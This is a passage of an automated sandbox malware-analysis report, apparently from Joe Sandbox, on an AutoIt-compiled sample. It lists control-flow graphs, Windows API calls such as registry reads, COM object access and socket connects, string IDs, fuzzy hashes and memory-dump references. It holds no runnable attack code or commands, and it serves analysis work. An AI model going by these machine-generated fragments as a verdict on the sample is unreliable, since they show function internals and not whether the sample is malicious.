b1d6b4 call b4503c call b12570 1524->1530 1525->1530 1526->1527 1531 b5c98f-b5c99c call b3a8c8 1526->1531 1537 b5ca18-b5ca1a 1527->1537 1538 b5c9fb-b5ca16 call b1ac65 1527->1538 1530->1541 1540 b5c9a1-b5c9a6 1531->1540 1543 b5ca1d-b5ca24 1537->1543 1538->1543 1540->1527 1545 b5c9a8-b5c9af 1540->1545 1541->1496 1549 b5ca26-b5ca30 1543->1549 1550 b5ca52-b5ca59 1543->1550 1552 b5c9b1-b5c9b8 1545->1552 1553 b5c9be-b5c9c5 1545->1553 1557 b5ca32-b5ca48 call b3a25b 1549->1557 1554 b5cadf-b5caec 1550->1554 1555 b5ca5f-b5ca66 1550->1555 1552->1553 1559 b5c9ba 1552->1559 1553->1527 1556 b5c9c7 1553->1556 1561 b5caee-b5caf8 1554->1561 1562 b5cafb-b5cb28 VariantInit call b21970 1554->1562 1555->1554 1560 b5ca68-b5ca7b 1555->1560 1556->1527 1571 b5ca4a-b5ca50 1557->1571 1559->1553 1565 b5ca7c-b5ca84 1560->1565 1561->1562 1575 b5cb2d-b5cb30 1562->1575 1576 b5cb2a-b5cb2b 1562->1576 1568 b5ca86-b5caa3 VariantClear 1565->1568 1569 b5cad1-b5cada 1565->1569 1572 b5caa5-b5cab9 SysAllocString 1568->1572 1573 b5cabc-b5cacc 1568->1573 1569->1565 1574 b5cadc 1569->1574 1571->1550 1572->1573 1573->1569 1578 b5cace 1573->1578 1574->1554 1577 b5cb31-b5cb43 1575->1577 1576->1577 1579 b5cb47-b5cb4c 1577->1579 1578->1569 1580 b5cb4e-b5cb52 1579->1580 1581 b5cb8a-b5cb8c 1579->1581 1582 b5cb54-b5cb86 1580->1582 1583 b5cba1-b5cba5 1580->1583 1584 b5cbb4-b5cbd5 call b4d7e4 call b4a6f6 1581->1584 1585 b5cb8e-b5cb95 1581->1585 1582->1581 1587 b5cba6-b5cbaf call b5c235 1583->1587 1594 b5cc41-b5cc50 VariantClear 1584->1594 1597 b5cbd7-b5cbe0 1584->1597 1585->1583 1586 b5cb97-b5cb9f 1585->1586 1586->1587 1587->1594 1595 b5cc52-b5cc55 call b41693 1594->1595 1596 b5cc5a-b5cc5c 1594->1596 1595->1596 1596->1496 1599 b5cbe2-b5cbef 1597->1599 1600 b5cbf1-b5cbf8 1599->1600 1601 b5cc38-b5cc3f 1599->1601 1602 b5cc26-b5cc2a 1600->1602 1603 b5cbfa-b5cc0a 1600->1603 1601->1594 1601->1599 1605 b5cc30 1602->1605 1606 b5cc2c-b5cc2e 1602->1606 1603->1601 1604 b5cc0c-b5cc14 1603->1604 1604->1602 1607 b5cc16-b5cc1c 1604->1607 1608 b5cc32-b5cc33 call b4a6f6 1605->1608 1606->1608 1607->1602 1609 b5cc1e-b5cc24 1607->1609 1608->1601 1609->1601 1609->1602
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          • Opcode ID: 5a81e1024204dcd4e3083b431f38bffe063186583b1efeebc4fe2b539162c041
                          • Instruction ID: 157188ce0f3dbbc4c5e5799f54e98bead6fed0c5ca7e907c1dcc4bcaf665f6e2
                          • Opcode Fuzzy Hash: 5a81e1024204dcd4e3083b431f38bffe063186583b1efeebc4fe2b539162c041
                          • Instruction Fuzzy Hash: EBE18F71A00319AFDF10DFA8D881BAE7BF6EB48355F1480E9ED45AB281D7709D49CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1611 b5bf80-b5bfcd 1612 b5bfd9-b5bfe1 1611->1612 1613 b5bfd4 call b21970 1611->1613 1614 b5bfe7-b5bfeb 1612->1614 1615 b5c21b-b5c21d 1612->1615 1613->1612 1614->1615 1617 b5bff1-b5bff6 1614->1617 1616 b5c21e-b5c21f 1615->1616 1618 b5c224-b5c226 1616->1618 1617->1615 1619 b5bffc-b5c00b call b4be14 1617->1619 1620 b5c227 1618->1620 1624 b5c011-b5c015 1619->1624 1625 b5c158-b5c15c 1619->1625 1623 b5c229 call b5c235 1620->1623 1629 b5c22e-b5c232 1623->1629 1627 b5c017-b5c019 1624->1627 1628 b5c01b 1624->1628 1630 b5c16d 1625->1630 1631 b5c15e-b5c160 1625->1631 1632 b5c01d-b5c01f 1627->1632 1628->1632 1633 b5c16f-b5c171 1630->1633 1631->1633 1634 b5c021-b5c025 1632->1634 1635 b5c033-b5c03e 1632->1635 1633->1616 1636 b5c177-b5c17b 1633->1636 1634->1635 1639 b5c027-b5c031 1634->1639 1635->1620 1637 b5c181 1636->1637 1638 b5c17d-b5c17f 1636->1638 1640 b5c183-b5c186 1637->1640 1638->1640 1639->1635 1641 b5c043-b5c05f 1639->1641 1642 b5c193-b5c197 1640->1642 1643 b5c188-b5c18e 1640->1643 1648 b5c067-b5c081 1641->1648 1649 b5c061-b5c065 1641->1649 1644 b5c19d 1642->1644 1645 b5c199-b5c19b 1642->1645 1643->1618 1647 b5c19f-b5c1c9 VariantInit VariantClear 1644->1647 1645->1647 1655 b5c1e6-b5c1ea 1647->1655 1656 b5c1cb-b5c1cd 1647->1656 1657 b5c083-b5c087 1648->1657 1658 b5c089 1648->1658 1649->1648 1650 b5c090-b5c0e5 call b1fa89 VariantInit call b21a00 1649->1650 1673 b5c0e7-b5c0f1 1650->1673 1674 b5c108-b5c10d 1650->1674 1660 b5c1f0-b5c1fe call b12570 1655->1660 1661 b5c1ec-b5c1ee 1655->1661 1656->1655 1659 b5c1cf-b5c1e1 call b12570 1656->1659 1657->1650 1657->1658 1658->1650 1672 b5c0fb-b5c0fe 1659->1672 1662 b5c201-b5c219 call b4a6f6 VariantClear 1660->1662 1661->1660 1661->1662 1662->1629 1672->1623 1675 b5c103-b5c106 1673->1675 1676 b5c0f3-b5c0fa 1673->1676 1677 b5c162-b5c16b 1674->1677 1678 b5c10f-b5c131 1674->1678 1675->1672 1676->1672 1677->1672 1681 b5c133-b5c139 1678->1681 1682 b5c13b-b5c13d 1678->1682 1681->1672 1683 b5c141-b5c157 call b4a6f6 1682->1683 1683->1625
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2862541840-625585964
                          • Opcode ID: 5f19bed3518b5fc8ba833ae2382804fbca793cddb9907049778a2f9ac3bcecf4
                          • Instruction ID: 1db5963cfffc6722e842bd29d3582a537f850d9407450f5159056ab9211c39a2
                          • Opcode Fuzzy Hash: 5f19bed3518b5fc8ba833ae2382804fbca793cddb9907049778a2f9ac3bcecf4
                          • Instruction Fuzzy Hash: EC918A71A00319AFCB24DFA4C884FAEBBF9EF44711F1481D9E915AB281D7709949CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5B74B Relevance: 12.3, APIs: 8, Instructions: 324COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1687 b5b74b-b5b7ac VariantInit call b0ca8e CoInitialize 1690 b5b7b4-b5b7c7 call b1d5f6 1687->1690 1691 b5b7ae 1687->1691 1694 b5b7d5-b5b7dc 1690->1694 1695 b5b7c9-b5b7d0 call b0ca8e 1690->1695 1691->1690 1696 b5b7de-b5b805 call b084a6 call b3a857 1694->1696 1697 b5b81b-b5b85b call b084a6 call b1f885 1694->1697 1695->1694 1696->1697 1707 b5b807-b5b816 call b5c235 1696->1707 1708 b5b861-b5b86e 1697->1708 1709 b5b9d3-b5ba17 SetErrorMode 1697->1709 1722 b5bad0-b5bae3 VariantClear 1707->1722 1711 b5b870-b5b881 call b1d5f6 1708->1711 1712 b5b8a8-b5b8b6 GetRunningObjectTable 1708->1712 1720 b5ba1f-b5ba3a CoGetObject 1709->1720 1721 b5ba19-b5ba1d 1709->1721 1724 b5b8a0 1711->1724 1725 b5b883-b5b88d call b0cdb4 1711->1725 1716 b5b8d5-b5b8e8 call b5c235 1712->1716 1717 b5b8b8-b5b8c9 1712->1717 1730 b5bac7-b5bacb call b05cd3 1716->1730 1734 b5b8ed-b5b8fc 1717->1734 1735 b5b8cb-b5b8d0 1717->1735 1727 b5bab5-b5bac5 call b5c235 SetErrorMode 1720->1727 1728 b5ba3c 1720->1728 1726 b5ba40-b5ba47 SetErrorMode 1721->1726 1724->1712 1725->1724 1742 b5b88f-b5b89e call b0cdb4 1725->1742 1733 b5ba4b-b5ba51 1726->1733 1727->1730 1728->1726 1730->1722 1738 b5ba53-b5ba55 1733->1738 1739 b5baa8-b5baab 1733->1739 1741 b5b907-b5b91b 1734->1741 1735->1716 1743 b5ba57-b5ba78 call b3ac4b 1738->1743 1744 b5ba8d-b5baa6 call b4a6f6 1738->1744 1739->1727 1752 b5b921-b5b925 1741->1752 1753 b5b9bb-b5b9d1 1741->1753 1742->1712 1743->1744 1754 b5ba7a-b5ba83 1743->1754 1744->1730 1752->1753 1755 b5b92b-b5b940 1752->1755 1753->1733 1754->1744 1760 b5b9a2-b5b9ac 1755->1760 1761 b5b942-b5b957 1755->1761 1760->1741 1761->1760 1764 b5b959-b5b983 call b3ac4b 1761->1764 1768 b5b985-b5b98d 1764->1768 1769 b5b994-b5b99e 1764->1769 1770 b5b9b1-b5b9b6 1768->1770 1771 b5b98f-b5b990 1768->1771 1769->1760 1770->1753 1771->1769
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00B5B777
                          • CoInitialize.OLE32(00000000), ref: 00B5B7A4
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00B5B8AE
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B5B9DB
                          • CoGetObject.OLE32(?,00000000,00B8D91C,?), ref: 00B5BA32
                          • SetErrorMode.KERNEL32(00000000), ref: 00B5BA45
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B5BAC5
                          • VariantClear.OLEAUT32(00B8D91C), ref: 00B5BAD5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                          • String ID:
                          • API String ID: 2437601815-0
                          • Opcode ID: 78c0effef61609dd94e0c97bc21acbf7c2069ebd5c89043dce558ec04c17caab
                          • Instruction ID: 2f947f109119e484382f3001f9ccf12c6d51330b7c054ef3f90dd99cd044521a
                          • Opcode Fuzzy Hash: 78c0effef61609dd94e0c97bc21acbf7c2069ebd5c89043dce558ec04c17caab
                          • Instruction Fuzzy Hash: E9C104716043059FC700EF68C884A6BBBE9FF88315F14499DF9899B261DB71ED09CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00B1EADA,?,?), ref: 00B1EB27
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00B1EADA,?,?), ref: 00B74B26
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00B1EADA,?,?), ref: 00B74B65
                          • RegCloseKey.ADVAPI32(?,?,00B1EADA,?,?), ref: 00B74B94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: QueryValue$CloseOpen
                          • String ID: Include$Software\AutoIt v3\AutoIt
                          • API String ID: 1586453840-614718249
                          • Opcode ID: 883767dde83fcefc91db745f639e080021009aab5737281d70314c8be245586c
                          • Instruction ID: da668384e413e3924d69136e9d0959e9b8aac4f5650d6aa7d4991c81e7930cd4
                          • Opcode Fuzzy Hash: 883767dde83fcefc91db745f639e080021009aab5737281d70314c8be245586c
                          • Instruction Fuzzy Hash: 49116A71A04109BEEB05ABA4CC96EBE7BBCEF04354F1040A9B506E71A1EB70AE01DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B02E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00B02ECB
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B02EEC
                          • ShowWindow.USER32(00000000), ref: 00B02F00
                          • ShowWindow.USER32(00000000), ref: 00B02F09
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 45ffad91ae3fb32d18df48fd9ebd71b1faf3a4b691e4f0e92b404c0f9c36f1a2
                          • Instruction ID: 211dd8befe7fa895a86444c547e2f8cd67f46922ff9768abffd55b8f763667fb
                          • Opcode Fuzzy Hash: 45ffad91ae3fb32d18df48fd9ebd71b1faf3a4b691e4f0e92b404c0f9c36f1a2
                          • Instruction Fuzzy Hash: 36F0D0715402D47AD731976B6C48E672E7EEBCBF20B01451FBA04A31B1D96508A5DA70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00B59409
                          • WSAGetLastError.WS2_32(00000000), ref: 00B59416
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00B5943A
                          • _strlen.LIBCMT ref: 00B59484
                          • _memmove.LIBCMT ref: 00B594CA
                          • WSAGetLastError.WS2_32(00000000), ref: 00B594F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLast$_memmove_strlenselect
                          • String ID:
                          • API String ID: 2795762555-0
                          • Opcode ID: 83394ec409bac289a043f22d42b5779315dac7a408cbbd001050a49cce4cff60
                          • Instruction ID: 6016223ce67625af909b489a9b899591cfbe317c3e6c086dc8ec1bc2a55c3a9e
                          • Opcode Fuzzy Hash: 83394ec409bac289a043f22d42b5779315dac7a408cbbd001050a49cce4cff60
                          • Instruction Fuzzy Hash: 07416075500204EFDB14EB64C985BAEBBF9EF48311F1042E9F916972D2DB30AE05CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B46D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B03B1E: _wcsncpy.LIBCMT ref: 00B03B32
                          • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00B46DBA
                          • GetLastError.KERNEL32 ref: 00B46DC5
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B46DD9
                          • _wcsrchr.LIBCMT ref: 00B46DFB
                            • Part of subcall function 00B46D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00B46E31
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                          • String ID:
                          • API String ID: 3633006590-0
                          • Opcode ID: 037ab10a014f134ed750eeb00b7ace9da72780cf1142d758b0dc46fbeb4c2b14
                          • Instruction ID: 6c63f713ea6ba6776dc54bec9299fd0b5baeebb2071febe8a8d9f73f6e18a254
                          • Opcode Fuzzy Hash: 037ab10a014f134ed750eeb00b7ace9da72780cf1142d758b0dc46fbeb4c2b14
                          • Instruction Fuzzy Hash: 5821A875A4132496DB207B74EC4AAEA33DCCF12710F2005E6E525D70E2EF20CF84AB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B59122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B5ACD3: inet_addr.WS2_32(00000000), ref: 00B5ACF5
                          • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00B59160
                          • WSAGetLastError.WS2_32(00000000), ref: 00B5916F
                          • connect.WS2_32(00000000,?,00000010), ref: 00B5918B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastconnectinet_addrsocket
                          • String ID:
                          • API String ID: 3701255441-0
                          • Opcode ID: af6c98572ff64d725fdffe8048c688fb4ea2d9d79fff58c468198f9bed2c6c08
                          • Instruction ID: 7b2c9d8ce1ad0d9b07a9ed896ca1a7a422a5898e25175c7e1b5086d185eb07ec
                          • Opcode Fuzzy Hash: af6c98572ff64d725fdffe8048c688fb4ea2d9d79fff58c468198f9bed2c6c08
                          • Instruction Fuzzy Hash: 95219035200611AFDB00AF68CC89B6E77E9EF48724F048599F916AB3E2CB70EC05CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B03DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B03F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B034E2,?,00000001), ref: 00B03FCD
                          • _free.LIBCMT ref: 00B73C27
                          • _free.LIBCMT ref: 00B73C6E
                            • Part of subcall function 00B0BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00BC22E8,?,00000000,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?), ref: 00B0BE8B
                            • Part of subcall function 00B0BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?,00000002), ref: 00B0BEA7
                            • Part of subcall function 00B0BDF0: __wsplitpath.LIBCMT ref: 00B0BF19
                            • Part of subcall function 00B0BDF0: _wcscpy.LIBCMT ref: 00B0BF31
                            • Part of subcall function 00B0BDF0: _wcscat.LIBCMT ref: 00B0BF46
                            • Part of subcall function 00B0BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00B0BF56
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                          • API String ID: 1510338132-1757145024
                          • Opcode ID: bfb8de045e738e9724f6b7f322904b37c0b5cff55f4a97d5853fbde889f9e8d7
                          • Instruction ID: 1a8faf7ffd2c8e7859719487d4278adfbe649a78e45f08baa4d3fe6a629a4dd3
                          • Opcode Fuzzy Hash: bfb8de045e738e9724f6b7f322904b37c0b5cff55f4a97d5853fbde889f9e8d7
                          • Instruction Fuzzy Hash: E0915171910219AFCF04EFA4CC929EEB7F4FF04710F1445A9F416AB291DB749A45DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B2413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • __getstream.LIBCMT ref: 00B2418E
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B241C9
                          • __wopenfile.LIBCMT ref: 00B241D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                          • String ID: <G
                          • API String ID: 1820251861-2138716496
                          • Opcode ID: 17c889dea0deebdf89615af757b19993463ee790490a3299d26dfacbdc19cf45
                          • Instruction ID: 33fb24ee9a65e31faaca78acba6fee8203fd4d4c9784cfd0e0b470ec4cf9c9c5
                          • Opcode Fuzzy Hash: 17c889dea0deebdf89615af757b19993463ee790490a3299d26dfacbdc19cf45
                          • Instruction Fuzzy Hash: 1911C471900236DADB10AFB4AC426AF3AE4AF55350B1485E5E41CEB281EB74C95197A1
                          Uniqueness

                          Uniqueness Score: -1.00%

